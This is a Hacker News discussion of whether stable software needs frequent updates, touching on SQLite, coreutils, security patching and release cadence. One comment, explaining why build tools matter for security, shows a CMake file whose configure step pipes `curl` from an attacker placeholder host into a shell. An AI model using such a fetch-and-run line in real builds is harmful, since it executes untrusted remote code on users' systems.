Why the Update Fever Is Bad (irrlicht3d.org)
149 points by irrlichthn 11 months ago | 110 comments



Software updates are a kind of project heartbeat. The content of them is less important than the signal, "this project is still alive, and maintainers are fixing issues for people". If a project does not put out updates, then users may (understandably) worry that if they have an issue, it won't get addressed promptly.

I actually don't think there is anything wrong with having time-based releases, and putting very little content in some of them. If you only fix one bug in a quarterly/bi-annual release and tweak some docs, because that's all that's needed, you have still fixed an issue for somebody, and demonstrated to all of your other users that you are still keeping your commitments, and there for them if they need you.


But on the other hand, if the software is stable and no longer needs updating why force small inconsequential changes just to appear to be maintained?

Just release when there's something to release.


There is no software without bugs.

People seem to know that. Developers sometimes do not.


There are projects that are close to bugfree, though. You can use a 3 year old version of sqlite without any difficulty. I don't know what version of "ls" or "mkdir" my machine runs, but I never worry about these simple utilities being out of date or behaving differently in release/staging. These utilities are essentially done, and 30 years from now they'll still work fine.

There is no software without bugs in the same sense that there exists no hardware that cannot fail. But you can create software that is so close to perfect that hardware failures outnumber software failures 100:1, so there is no point in pursuing perfection any further.
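On the "3 year old version of sqlite" point: you can at least see exactly which library you are running. A small sketch using Python's stdlib sqlite3 module, which reports the version of the SQLite library it links against (the 3.7.0 floor is an arbitrary example, not a real recommendation):

```python
import sqlite3

# A hypothetical minimum known-good version, for illustration only.
MINIMUM = (3, 7, 0)

def linked_sqlite_ok(minimum=MINIMUM):
    """Return True if the linked SQLite library meets the given version floor."""
    return sqlite3.sqlite_version_info >= minimum

# sqlite3.sqlite_version is the linked library's version string, e.g. "3.39.5";
# sqlite3.version (pre-3.12) refers to the Python module itself, not SQLite.
print(sqlite3.sqlite_version)
```

Pinning a floor like this is one way to rely on "old but stable" deliberately rather than by accident.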


SQLite is not typical software. It has over 90 million lines of test code, and is run in production every day by pretty much every computer in the world.

mkdir(1) is also not typical. Excluding the copyright header comment, it's so short that it fits entirely on one screen. If I ran into a bug, I could probably find it and fix it (or write my own version) in about 3 minutes.

It is indeed possible to "create software that is so close to perfect that hardware failures outnumber software failures 100:1", but it's so time-consuming that almost nobody ever does it.

Version 1.0.1 of a free mind-mapping app may be good and useful software, but I can virtually guarantee it has bugs. I doubt even the author would claim it's only at 1.0.1 because "there is no point in pursuing perfection any further".


I agree that sqlite's quality is unusually high. That's why I used it as an example of what kind of quality is achievable.

However, I think you're approaching this from the wrong way. The most important thing about sqlite isn't the amount of manhours put into it, but the millions upon millions of manhours that have been saved because the product works so unbelievably well.

sqlite is the exception, and this is because the people involved in it really care about quality. Our software engineering culture has a lot to learn from the success of sqlite.


> mkdir(1) [...] it's so short that it fits entirely on one screen.

296 lines in the main .c file, without counting the headers and helper functions: https://git.savannah.gnu.org/cgit/coreutils.git/tree/src/mkd...


And, entertainingly, it contains a FIXME! https://git.savannah.gnu.org/cgit/coreutils.git/tree/src/mkd...


http://www.cvedetails.com/vendor/9237/Sqlite.html

Really? Running a 3-years-out-of-date sqlite install?

Methinks some hackers smell chum in the water. XSS, remote code execution, privilege escalation, directory traversal... and for most of these, we even have choices on how to attack! Plenty of overflow attacks involved here. Where are the idiot script kiddies when you need them to demo how this ignorance hurts?

And once in to your sql database, I wonder where else we can pivot...

Remember how shellshock shook the world, because the software bedrock was actually insecure? Yeah... your old, "stable" stuff has had holes the entire time.

Stay current. If your OS makes that a challenge, ditch it for a better one.


mkdir? I'm trying to imagine somebody deciding to no longer use directories because mkdir looks like it's been abandoned.


> are close to bugfree

Or bugfree for the use cases of its users (however many or few there may be).


I've had enough of small utilities that didn't work as expected. Also, ls or mkdir can, for example, be part of busybox ported to a Blackfin. No guarantee whatsoever that these are bug-free!

Edit: here you have the source code for the "small" ls utility: http://git.savannah.gnu.org/cgit/coreutils.git/tree/src/ls.c. Yes, over 5000 lines.


Your claim was that "there is no software without bugs". I'm pointing out that this is true only in the narrow philosophical sense. You cannot draw a perfect circle, either. But you can draw a circle that gets pretty damn close.

Software cannot be perfect but this doesn't mean that software needs to be shoddy. sqlite is a complex product and it has orders of magnitude fewer bugs than other projects of similar complexity.

It is factually, observably, possible to create software that is very close to perfect, it just takes a lot of hard work. Software has a reputation for being buggy not because it's impossible to write flawless software, but because most software is really poorly written.


The feature bloat is typical for GNU coreutils; for reference, ls.c for OpenBSD, NetBSD and FreeBSD is 614, 716 and 933 lines respectively [1][2][3]

[1] https://github.com/Bluerise/OpenBSD-src/blob/master/bin/ls/l... [2] cvsweb.netbsd.org/bsdweb.cgi/~checkout~/src/bin/ls/ls.c?rev=1.75.4.1 [3] https://github.com/freebsd/freebsd/blob/master/bin/ls/ls.c


While this is true, I think all that matters is promptness.

If someone opens an issue, will it get addressed quickly? That's what users care about.


Maybe the developer is developing something else and will come back to the first project in time.


and from the article itself: "[...] and is pretty stable and bug-free by now."


Because being maintained is very important for users and one of the easiest and most convincing ways to show that is to release updates.

But then we have the other side, releasing update after update without fixing or responding to common issues. That is quite damaging as well.


> Because being maintained is very important for users and one of the easiest and most convincing ways to show that is to release updates.

It's so true that you never ever see people using decade old versions of software, right?

Users care that their shit works, that's it.


> Users care that their shit works, that's it.

Exactly, so when that forced OS update broke the software it is kind of nice to know that someone is still around to fix it.


Never mind when an update is effectively a rewrite that strips out features/behaviors someone, somewhere, relied upon.

This duality of updates is why people avoid updating.


Maybe for 'trivial' software that can be the case. However for anything complex even if there isn't a problem inherent in the software there are still interactions with the environment which could cause a need for some workaround.


> Just release when there's something to release.

This emphatically does not work very well for big projects. The problem is human psychology and the unreliability of all effort-estimation processes in software development. Once people get used to the idea that "well, we'll just postpone the release a little bit", it eventually becomes routine, and for popular projects there's always someone with a good reason that their particular feature should make it in before the release. (Because who knows when the next release will be?)

The Linux kernel and the C++ ISO standards committee have got this EXACTLY right (since C++11). Predictable releases means:

a) you don't need to rush anything particularly because you know there'll be a new release in N months.

b) any incidental small (not-worthy-of-a-release) bugs get fixed in the interim.

c) downstreams can plan based on when your next release is going to happen.

Predictability is a huge deal and IMO it's incredibly underappreciated just how much it matters. Even if it meant a 10% or 20% 'efficiency' loss (on some metric) I would personally still consider it a win.

For an example of not doing it this way, look at C++ pre-2011 and perhaps also ECMAScript pre-2015. (This is also rampant in development generally, though no public examples come to mind right now. I'm sure some other commenter can supply some. It's so bad that it can in fact kill projects.)

EDIT: I forgot to mention: Regular updates also means that the "consumer" must get into the practice of regularly applying updates... and will thus become forced to get better at doing that. Ideally to the point of having completely automated updates.
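Point (c) is the mechanical payoff of a fixed cadence: downstreams can literally compute when the next release lands. A trivial sketch of that property (the dates and 90-day train are made-up examples):

```python
from datetime import date, timedelta

def next_release(first: date, cadence_days: int, today: date) -> date:
    """Next release date on a fixed cadence, e.g. a release train every N days."""
    if today <= first:
        return first
    elapsed = (today - first).days
    cycles = -(-elapsed // cadence_days)  # ceiling division
    return first + timedelta(days=cycles * cadence_days)
```

Nothing in the computation depends on what's in the release, which is exactly why "we'll just postpone a little bit" never enters the picture.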


Some people just want to stay home and watch movies and live a tranquil life while others don't feel good if they aren't permanently moving and discovering the world.


Some people want to move and discover the world but can't because their computer is constantly bleating for attention toward make-work 'updates' that really do nothing but bump the version number to reassure the insecure sorts that stay home all the time.


Software is very rarely perfect though. There are some rare cases like Winamp and Photoshop where there's just not much to add.

I do find projects like Dwarf Fortress very charming in that there's an endless supply of new things to look forward to.


Photoshop has a new release every year or so, usually with new features.


The term "Creeping Featuritis" probably applies to that specific example. And any MS Office release in the last decade or so. :)


Nah, with Photoshop most of the new features are pretty useful. As abysmal as Adobe is with some stuff, they seem to get Photoshop right all the time.


DF is also unlikely to be critical to someone's workflow or similar.


Here is an example: old wi-fi router firmware that you can't get updates for is vulnerable to problems discovered in the original algorithms, which are correctly implemented in that firmware.

Software can only be as correct and complete as its specification. If that is a moving target, oops!


Literally every time I've let my phone update the Android version, something changed to my detriment - missing feature, not being able to do something a certain way anymore, etc. with the only benefit being the ability to run apps that only target the new version. App updates are often no better.


I think this is part of the mindset the OP is criticizing.

Following that logic, software cannot possibly be completed - it can either be in development or dead. Which would mean you either have a budget of time, money and resources for constant maintenance of your software - or you might not write that software at all. Repeat that for every new piece of software you want to write.

The problem is that this is impossible to do for hobbyist authors, so we would lose a large amount of free or open-source software currently available.


Did you realize that Torvalds did not have anything to do with Linux 2.6.32.70?

He offloaded the whole project onto another team (who mostly backported fixes) that kept it going until early 2016. The rest of us were already in Linux 4.X territory by then.

If you can't maintain it, you can pay someone.

Or, thanks to Github, lets talk about letting the code-literate userbase sort it out themselves. Assuming they care enough.

Or, we could pivot this discussion to the "evils of Capitalism" and whatnot since that userbase probably needs to eat.


This assumes there is a team or a "code-literate userbase" and you trust them enough not to do bad things with your software (e.g. add adverts, tracking, backdoors or miners)

> Or, we could pivot this discussion to the "evils of Capitalism" and whatnot since that userbase probably needs to eat.

Or we could try to step back and accept that software could also simply be a tool and doesn't have to be an enterprise.


There's kind of a parallel with signals regarding businesses as well. There may be nothing wrong with a store that hasn't been renovated since the 90s, but it gives off a "run-down" vibe like it wouldn't be there much longer.


Difference is that buildings etc. need to be maintained or else they break down. Software, barring weirdness like "bitrot" from unreliable storage hardware, does not break down.


CVEs, etc accumulate with enough attention. Whether they're published depends on whether your team courts or snubs the security side of the industry.

I wonder how many coders out there don't know about the dangers of global variables in production software, sans obfuscation. Or can't articulate why an unbounded array is evil, even if the compiler lets you do it.

Seriously... free love was a nice party. But then when public knowledge of STDs arose, the party died down. Today, condom use is on the rise.

Similarly, our free Hobbyist Software love has had a good run. If it dies back, we'll lose a generation of up-and-coming coders. So I guess the message here is jails/containers? Wear your software condoms, kiddies.


Glad to see this being written.

"Trained" is the word I have thought of many times as well. It is perplexing to see people wanting updates.

It is possible to write finished programs that are bug-free[FN1]. But when eternal rounds of patching becomes a religion, what sort of standard are developers promoting? Every program is expected to have security holes that will need to be patched? What about not releasing software unless it is safe to begin with? Why does a liability need to be created? Solve the problems before the software is released. Not after. Can't solve them? Then do not release.

Automatic updates are also a security hazard in the same way as "antivirus", which also trained users to want updates. It is a backdoor that users are advised to leave open.

FN1. Inevitably there will be the HN commenter who repeats some meme that says all software has bugs. True perhaps if we forget about Ada and the world outside of MS Windows, but are all the bugs major ones? Consider the stuff you find at http://cr.yp.to. Or many of the small UNIX utilities. I could name more selected examples. There is such a thing as finished software. With no major bugs. That does not need constant updates.


Whether or not software can be finished with 0 bugs is sort of irrelevant. Windows and the other software that users rely on most will basically never be "finished".

The updates that are causing the fever are not just "bugfixes", they are the current state of living software--always expanding and improving (at least in intent). The fact users see software that hasn't been updated as dead is a reflection of their learned expectations. And they are correct, it likely is dead in the "no longer improving as my other software is" sense.

The real issue I have is how shitty most update processes are. Thanks for rebooting my PC Win 10, yes Sublime Text, please tell me again in a dialog that there is an update, etc. Some apps have done much better here like Chrome and Discord, but it is not an easy thing to build.


The question - and what the article is arguing is about - is if the "no longer improving as my other software is" part makes sense. Does software always have to change (not necessarily improve as software will become worse almost as often as it'll become better - especially when it comes to GUI programs that often tend to shuffle things around, invalidating the users' knowledge)?


I think people tend to memorize how they use software, so randomizing or frequently changing your UI is superbly bad; on that I agree with your point and that part of the article.

The trouble I still see is that most software is barely held together built on top of stuff that is even worse. From my experience, if it is running on Android or Windows, it is 100% guaranteed you will have an issue you didn't predict because some set of users have done something crazy to their device. I guess you could always leave these things broken for a while, but it would reflect poorly and is hard to convince others that "oh this crash is ok".

I guess tl;dr I think most software is broken and always broken and updating more or less frequently wouldn't really change the brokenness for users, but the frequent updates at least give them hope fixes are coming and their feedback matters. Knowing you'll have this bug forever makes any alternative attractive.


> There is such a thing as finished software. With no major bugs. That does not need constant updates.

The general attitude (both on HN and elsewhere) is that if any security update exists for a product you use then you are a complete moron not to update it immediately. There is virtually no acknowledgment of any nuance on the topic in my experience.


I think this is what people officially say, because this is the "right" thing to do, and in general it makes sense. But in real life things are different. I had to support many ancient systems with no security updates for years or even decades now. For some of them some updates were available, but we didn't even have the hardware to test them on. Yes, we were gradually moving many older parts to newer systems. Nevertheless, in the case of these older machines working in isolated networks, trying to patch them was just asking for trouble. I bet many admins on HN have similar experience.


In other words, people are "virtue signaling"...


Not applying a security update is willingly leaving a known security hole in place. At best, you are making your system insecure, and at worst, you are putting others on your network and/or in your social circles at risk.


or.... You are trying to avoid an update that is going to break your machine/workflow. If security updates were sent along a different channel than feature updates, this wouldn't be an issue. But companies keep tying these together, and there are only so many features you can carelessly break before users become aware of what you are really doing.


If you are not happy with the direction a certain piece of software is heading in, you are free to switch to a competitor that fits your workflow better.

This mentality is what led to Windows XP sticking around long after being declared dead.


If you are lucky to have a competitor. This type of thinking is so naive, I can't believe we still see it pop up every now and then.


I'd like you to expound upon that lack of competition. Where does it pop up?


Android vs iPhone; any website that is moving in a "modern" framework direction; software that runs MRIs or CTs. Also any software that is picked by middle management rather than the people who actually use it: ADP, Oracle, anything in the education realm, etc.


All software has bugs.

There is no such thing as finished software.

The size of a bug is in the eye of the beholder.

Sorry for the Shellshock.

Edit, took me two seconds to find: https://news.ycombinator.com/item?id=502651. Just as a response to http://cr.yp.to/djbdns/guarantee.html


You may be missing the point of the post. Good software asymptotically approaches bug-free over time, meaning it should require fewer and fewer updates, less and less frequently. But reduced update frequency is perceived as the death of software, and this is actually a problem. I even see it in developers, who use update frequency as a metric when choosing frameworks and libraries - which is a mistake for older software.

I saw a study done on GitHub where the author wanted to know which languages had the smallest open bug count, and found unexpectedly that C and C++, which are notoriously bug-inducing languages, had some of the lowest bug rates of all the languages. His conclusion was that the low bug count was due to those languages being used for foundational work - libraries and drivers and such - basically reaffirming the 'many eyes make shallow bugs' adage.

A better metric for whether software is still being maintained is how responsive the maintainer is on their mailing list/support channel. Regularly seeing requests go unanswered likely means that any updates that do happen are ignoring actual user needs as well.


"Many eyes make all bugs shallow" has been considered an eye-rolling phrase for years now. The reason that foundational C/C++ libs have few open bugs on Github is because they all predate Github and have their own bug trackers, and Github's issue tracker is so anemic (or, more charitably, optimized for small projects) that it offers little incentive for switching.


Addendum: I also believe it is possible to write software that does not need to be "improved". I prefer reliable software over "dynamic" software that is in a constant state of flux. And as you might guess, I am not fond of software that keeps expanding with "features" to fill available space. I am quite happy if software just keeps doing what I expect it to do, without slowing down or failing. The question I would ask of other users who appear to want updates is whether they want new features, or whether they are hoping the next update fixes some specific or general annoyance they are experiencing - e.g., perhaps they are generally not thrilled with the software and hope the "new" or "updated" version will be less disappointing.

While some may think I have misinterpreted the blog author (and I acknowledge this is a valid response), I still think that bug fixes or nondescript "security fixes" are a powerful, fear-based mechanism to compel users to allow updates -- of any kind. This is therefore relevant to any discussion of "updates", especially when it is common for these bug or "security fixes" to be inextricably mixed with non-security items such as "features", in such a way that the user must accept the "whole hog" -- perhaps in some way similar to "omnibus legislation" in the US Congress.

I respect everyone's opinions whether you agree with me or not. I am just happy to see that some users may be thinking about "updates" and what they really are instead of blindly accepting them without ever pausing to think.

From my perspective every new "feature" that adds code is also introducing a new potential for a bug or security issue. I want programs and systems to get smaller not larger.


A Linux util is more like a program function than a piece of software. The fact that it's compiled as a separate executable isn't really relevant, as it's typically deployed as part of something bigger, such as a Linux distribution - which is a piece of software that is certainly complex enough to have bugs forever. "Bug free" software might exist but it's rare.

The most important thing is that I need to be reassured that if a major bug is discovered in the software I’m using, then it will be fixed. How can I be sure of that? The absolutely simplest way is if the software releases regular updates with very small changes. It’s a heartbeat to let people know there is someone that will solve the future problem.

I don’t even need to install these updates! They are mostly symbolic, that doesn’t make them irrelevant.


Even small UNIX utilities have had many bugs. See the BUGS section in numerous man pages.


People expect their software to improve over time, and thus receive updates, and this is perfectly reasonable. Most software is never "done". If it is a small module written in a highly mature language and operating in a stable, slow moving ecosystem, then fine. In those cases, simply document that updates will be few and far between and that this is expected for the above reasons.

More likely, development simply slows down because the maintainer got lazy, moved on to other interests, or doesn't have time for other reasons. Users don't like this and they are right to worry that the maintainer may be unresponsive or that the software will not be quickly patched in the event of a security vulnerability being discovered because the software is not actively maintained.

Your software is not complete. It is merely functional. In fact, it may not even be functional, as the rest of the world moves on without you and your code rots away.


Counterpoint: I've written a lot of niche utilities over the years. Some of them are very simple, and some of them are very complex. They're specialized enough that in most cases, they are the only software that performs a specific type of work.

To my knowledge, they all still do exactly what I made them to do. Are there things I would like to add to some of them if I had unlimited time? Yes. Does not having time to do that mean that they've stopped doing what they were designed to do? No.

The only time I can see an argument for frequent updates being required (as opposed to a bonus) is for software with direct dependencies on other things. youtube-dl, or the NTDS.dit-extracting functionality in Impacket, are good examples of this - they work directly with content that may change at any time, so someone needs to make sure they're compatible with the current versions of that content.


I stopped letting my iPhone update. I swear every update makes it slower and buggier. My old iPad, which was perfectly fast and great at the time, is now almost unusable after 4 iOS upgrades. It won't even play Sudoku without constant mini freezes.


People would rather use a functional but insecure tool than a broken secure one. No question. It's hard for devs to understand that for some reason.


My iOS device is noticeably laggier too, and I find it difficult to point the finger at security fixes. More likely the bloat from a load of features that nobody asked for.


Because devs live and breathe security. The end result is that they develop blinders to anything else.

Also, they know when and why to update the stuff they work on, so it never happens at an inopportune time. Nor do they find themselves having to wrangle the new dependency kudzu they created, because for them it built up over time.


I don't think it's the added security that makes new software slower and less responsive.


[flagged]


Please don't be personally rude to other users here.

https://news.ycombinator.com/newsguidelines.html


I guess if your software is stable and 'finished' enough not to be updated often then it would be good if you have an established communication channel (like a website or a GitHub page) that will periodically come out with, well, 'news updates', since it is true that most users are conditioned to expect some kind of update/activity surrounding their software.

Besides, any moderately complex software will probably have enough bugs to require updates now and then for years, even if no new features are added. Not only bugs; often the underlying platform changes/breaks, needing workarounds or rebuilds.


This is something I see with Common Lisp libraries a lot. Many of them look abandoned, because they've had no updates in years. But they're really not: they each aimed to do one thing, they each do it well, and they don't have any more (notable) bugs. The Lisp spec doesn't change, so if a library's functional spec doesn't change … it's complete.

E.g. https://github.com/dardoria/uuid a library to generate UUIDs: once it fulfills the spec properly, it's essentially done. This particular example could contain a bug, of course, but the principle stands.
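As a rough illustration of why a spec-bound library can be "done": the properties RFC 4122 fixes are mechanically checkable, e.g. with Python's stdlib uuid module (this is a generic sketch, not that library's API):

```python
import uuid

def is_rfc4122_v4(u: uuid.UUID) -> bool:
    """Check the version and variant bits RFC 4122 mandates for a v4 UUID."""
    return u.version == 4 and u.variant == uuid.RFC_4122

u = uuid.uuid4()
assert is_rfc4122_v4(u)
```

Once a library passes checks like these for every UUID variant the spec defines, there is nothing left for the spec to ask of it.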


It does not even have a readme. What kind of definition of done is this?


I gave up on Windows about 10 years ago. I've had to use it for work sometimes, but Windows Updates are sometimes actually destructive, and often take hours to install during business hours (especially if you happen to need to reboot before an important meeting...). I can't handle uncertainty in software, and I think that many businesses are losing productivity because of this. Or maybe IT support departments are happy to keep themselves employed.


Sadly the Linux ecosystem (barring the kernel and the GNU-supplied coreutils) does not seem to do any better. And from what I gather, Apple is notorious for breaking things as they see fit as well. Not sure how well the BSDs do in this regard.


I am a Debian sid user, so I know well what you mean, but as long as you don't do a kernel upgrade, Linux has been extremely stable for me. This wasn't always the case. 10 years ago, Debian sid would break all the time, but I have probably had only one or two non-kernel/driver related issues in the past 5 years.

Another subtle difference is that on Linux platforms, you have more control over when/how to update, as well as visibility into exactly what is updating. I'm sure it's visible on other platforms, but I don't have to worry about rebooting my machine and having to wait 2 hours for it to come up.

Perhaps another point worth mentioning, LTS versions of Linux distros (Debian stable, or Ubuntu LTS versions) mainly get security patches, and, optionally, back ported software. That makes your OS stack super stable!

I'd put kernel upgrades into a different bucket... but most users don't need to update their kernel on a daily or even yearly basis except for security patches.

Great point about coreutils too! No need to update ls and grep...


This doesn't say much about why it's bad. Colin Percival wrote a more detailed piece on updates, their problems and considerations here: http://www.daemonology.net/blog/2017-06-14-oil-changes-safet... and suggests separate channels for 'updates' vs. 'security fixes'.

> This is something new for Microsoft: Usually they won't break their own old software with updates, they are known for keeping up backwards compatibility at all costs.

It really isn't. Thirteen years ago: https://www.joelonsoftware.com/2004/06/13/how-microsoft-lost...

> If you ask the users about it, they don't even know why they want these updates. Is there a feature they are missing?

New things are fun. Maybe there'll be a feature I don't know I'm missing until I see it. I'm hankering for you to amaze me and fix all my problems. Be my Holy Grail of (text editing, browsing, productivity, databasing, developing, life ...).


New things are fun when you are young. As you grow older you learn to appreciate stable reliable behavior.


With such a huge spectrum of kind of software, what applies in one kind won't necessarily be so for another.

The heartbeat argument is an obvious case. It's the same reason people look at the UI "chrome" in the screenshots on the Android Play Store - if the battery indicator is from Eclair, it doesn't build confidence that it'll work on Nougat!

But that may apply less to a more minimalist utility (eg a command line tool)

Merely updating so that you formally confirm this version was tested on newer systems may be valid in some cases (although in many cases one could merely update the documentation for that).

And then there is the dependency argument. Where a tool directly contains underlying packages, it builds confidence the developer won't get stuck too far behind current(ish) versions (with the greater risk of it becoming abandonware). Where the dependencies are external (ie up to the user to have installed) you do not want to be stuck on some old version, as other tools may move on, even if this super-stable software doesn't feel the need.


I agree with this to a certain extent. If more care had been put into the software to start with, it shouldn't need frequent updating. And bugs can often be introduced by an update to a dependency, because you cannot be sure that all your dependencies preserve backwards compatibility. Usually it goes something like this: an inconsequential dependency has a security vulnerability that needs updating, which requires two other dependencies to be updated; the third one is pretty hacky and has a latent bug. The software is updated, but over the next month three more hotfixes are needed to address the bugs from the bad dependency. Thus the software lifecycle continues. Btw, I thought this related article was really interesting: https://www.siliconrepublic.com/innovation/darpa-working-on-...


Show them somehow it is still supported, update the minor version or something.

In general:

If I come across a 3 year old binary and no news article about dev activity, it looks "dead and unsupported". Likewise on GitHub: if there is no commit for 1+ year, it looks "dead and unsupported", and a pile-up of GitHub issues is also a bad sign. Using a "dead" binary asks for trouble down the road, when you want to use it in a few months and it has stopped working.


Binaries (without external runtime dependencies) generally don't just "stop working" like that unless you change something significant about your system.


Ideally yes, but the world has changed. There is a constant stream of updates for your OS, graphics card driver, etc. which constantly break things left and right. If it affects a big piece of software (even an outdated version), the user outcry will make sure it gets fixed. But you'd better make sure not to rely on an unsupported, 3 year old, rather niche piece of software if you plan to upgrade anytime soon.


If a software is under active development, one would at least occasionally expect updates with new features and enhancements. Even if it is just in maintenance mode, there would be bug and security fixes. Not every week, but at least every couple of months. With software like iOS apps, it is a huge warning sign, if apps are not updated after OS updates or especially after new devices introduce new screen sizes. And with iOS, those apps are eventually going to stop working.


It's not like we always have the choice not to upgrade, either because of security (IoT anyone?), because one of the giants' shoulders a piece of software has been built on has gone wild or has its own security fix to deploy (https://github.com/blog/2470-introducing-security-alerts-on-...), or just because updates are installed automatically and it's too late when you realize it's broken :-/

Edit: Android devices do not suffer from this fever, btw. How good. Really. https://danluu.com/android-updates/


>>> Is there a feature they are missing? A specific bug they want to have fixed? They don't know. They only want updates, because they are used to it.

A long, long time ago DJGPP 2.0 was released, and almost immediately people were asking when version 3.0 was coming out.

It was a DOS port of the GNU C compiler, so really you can't make a new version of it until the next GCC comes out. Plus, the question was, "What would the update have?"

It's not like commercial software where you need to add features every quarter so your competition doesn't leave you in the dust.


> So for non-security critical software, it is sometimes better not to update that often. This update fever is bad both for developers and users.

What software is non-security critical anymore?


An appropriately sandboxed process that has no access to other processes or files can be considered non-security critical. But sadly nearly all programs commonly in use can access all the user's data and do with it as they wish (hence ransomware), so we are forced to consider every program security critical.


> What software is non-security critical anymore?

LaTeX, MATLAB, CMake...


Terrible examples, considering that these are programming languages that people will use to run code from random sources.

"git clone foo && cmake foo" can definitely be a security problem, and not just because the code itself is untrusted.
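To illustrate the point: CMake executes commands at *configure* time, so the `cmake foo` step alone can run arbitrary code before anything is even built. A minimal (hypothetical, attacker-supplied) example:

```cmake
# CMakeLists.txt from an untrusted repository.
cmake_minimum_required(VERSION 3.10)
project(foo)

# execute_process runs during `cmake foo`, before any build step,
# so nothing stops an untrusted project from doing this:
execute_process(COMMAND sh -c "curl https://attacker.example | sh")
```

(The URL is made up; the mechanism is not. The same applies to configure scripts, setup.py, and most other build systems.)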


It's not cmake's job to limit the behaviour of programs written with it.


OTOH, allocating & using memory correctly so that a maliciously-crafted Makefile can't get elevated permissions is.


A makefile can call whatever it wants so if you run a malicious one you're already hacked. There's nothing you can do with a cmake buffer overrun that you can't also do just by writing a normal cmake file to call out whichever malicious commands you want.


>> It's not cmake's job to limit the behaviour of programs written with it.

> OTOH, allocating & using memory correctly so that a maliciously-crafted Makefile can't get elevated permissions is.

https://en.wikipedia.org/wiki/Not_even_wrong


You are technically not wrong, of course, but if the attack vector got already to running Makefiles on your system, you should probably focus your effort to tighten security elsewhere.


A lot of commenters have keyed in on the product heartbeat line. Shipping updates is one common signal of a healthy product, but it's not the only one. If your product has non-user-facing changes, you should try to make noise about what other people are actively building or doing with your product. Or if you're offering a service, market reliability and put time into showing stability and educating customers on why they should trust that they can build with you. You should also be working on acquiring customers if your product is in that phase. Realistically you're talking about a product that requires little to no maintenance for existing customers, which should free you up to spend time getting more customers.

Any of the above is going to realistically create feature work as you work with new customers or users and find further areas for completing your product offering.

Word of caution — this work will never realistically end, or you will end. There is no end state to software. Software is the tool, the product is your user or customer community and the problems you solve together. If you’re looking to build software as an end state, I see obvious problems, and your customers do too.


BTW Irrlicht is great so thank you to the author for making it. CopperCube looks good too. But that is one reason someone might not update a project a lot -- they are making other stuff, for example something along the same lines that could make money. But Irrlicht still works great and still has a forum etc., so I would not complain if there weren't more updates.

Actually I wouldn't really want another update at this point, because I already have a code base built on the existing thing that does what I want and adapting to new/changed stuff would distract from developing features specific to my system.


I don't know if it's just me, but I have to exert significant energy to convince (typically) new hires that it does not really hurt anything if we use older versions of some dependencies, as long as they are stable and we are not hitting any bugs or vulnerabilities. In other words: the mere release of a new version is not reason enough, and not worth the effort, to update.

Such discussions usually end in one final argument from the new developer: "But your version is no longer maintained!"


Interesting debate, updates as a product viability signal.

I can see the angle as a developer that there isn't anything new this week/month/quarter in the software. And I can see the user angle that if it hasn't been updated perhaps updates are no longer available.

That makes me wonder if an update that says the software continues to be in good shape (a non-update update) would assuage the user. Something like that could be automated and so not impact the developer.
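One possible shape for that automation, as a sketch (the function names, cadence, and note format are all assumptions, not any existing tool's API):

```python
from datetime import date, timedelta

# Assumed cadence: after ~90 quiet days, users may start to wonder
# whether the project is still alive.
HEARTBEAT_INTERVAL = timedelta(days=90)

def needs_heartbeat(last_release: date, today: date,
                    interval: timedelta = HEARTBEAT_INTERVAL) -> bool:
    """True when enough time has passed since the last release that a
    'non-update update' would reassure users."""
    return today - last_release >= interval

def heartbeat_note(version: str, today: date) -> str:
    # The "non-update update": no code changes, just a dated statement
    # that the current version is still supported and tested.
    return (f"{today.isoformat()}: {version} is still current. "
            "No changes were needed; the project remains maintained.")
```

A cron job (or CI schedule) could run this and publish the note to the project's news feed, so the developer never has to ship artificial releases by hand.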


> Is there a feature they are missing? A specific bug they want to have fixed? They don't know. They only want updates, because they are used to it.

That doesn't sound like the most charitable reading. A lot of customers expect updates to mean performance improvements or security fixes, neither of which they'd be able to ask for with any kind of specifics.


Tail wagging the dog.

If it needs a fix, update it.

If you want to increase awareness, add a feature.

If people are paying a software support fee, or have a contract stating a certain number of releases a year, then do releases.

Otherwise why risk introducing new problems


I wouldn't call myself very experienced, but software is really brittle and everything is built on top of something else, so an update triggers an update triggers an update..


But there are other ways to build software. You can make apps with very few dependencies, use stable APIs only, program defensively, make sure you properly read the docs and handle all error conditions, don’t add unnecessary features, etc.

The result can be an app that requires minimal maintenance and it might work for years without any changes at all.


But doing so takes focus and diligence, something the software world is notoriously short on (likely because they can always push another fix to prod, unlike with hardware).


And it wasn't always like that with software. We're used to the current situation in the age of portable devices and app stores, but I remember buying software in the 80s and 90s when most people didn't have a modem or any networking connectivity on their home machines. You went to a store, and bought software on disk or CD that came in a cardboard box shrinkwrapped in cellophane. You tried out the features, and it either worked or it didn't. And if it didn't, you were stuck - but that generally didn't happen, to my memory. Because of the lack of options when the product was on the shelves, it was tested rigorously. (Of course it would be fair to say that it would be a siloed runnable that wouldn't generally have dependencies or be required to interoperate with anything else, but the feature density would be comparable).

There was none of this "fix it in tomorrow's release" from the "just ship it duuuudes", so you didn't find obvious defects in features within minutes.


Do a fake update at a semi-random time. Visualize it, e.g. show them a dialog with a progress bar and percentage.


Thus wasting other people's time and productivity?

I'm using the Atom editor. It's kind of annoying how it pushes new updates every week. Previously I used Sublime Text 2, which just worked and did not have an update for years.


Sublime is a great example of users getting update fever. The forum is riddled with long ”is this software dead?” threads that pop up at regular intervals.


Eventually it will be, if they stop updating it. Atom and visual studio code are overtaking it.


Excellent, well put!


maybe nullupdates should be a thing.


For anyone thinking about doing this, here are some free release note templates:

"Bug fixes and stability improvements"

"Thank you for using <X>! For your benefit, we update <X> continuously. Every update for <X> potentially includes new features, bug fixes and other improvements. Don't hesitate to reach out to noreply@<X>app.com if you have any questions or suggestions."

[In Dutch:] "Thanks for using <X>! While filling in the release notes our intern wasn't paying attention and accidentally pasted the wrong language. No problem. We hope you enjoy this new version!"

(For the longest time, the Dutch Facebook Messenger app had release notes in some Scandinavian language.)


A lot of popular iOS apps are doing this, which I personally find extremely annoying.


I would reckon that the average user doesn't care for a list of specific bug fixes.


So many big apps (including some from Google themselves) have such a line permanently bolted to them over at Android as well.



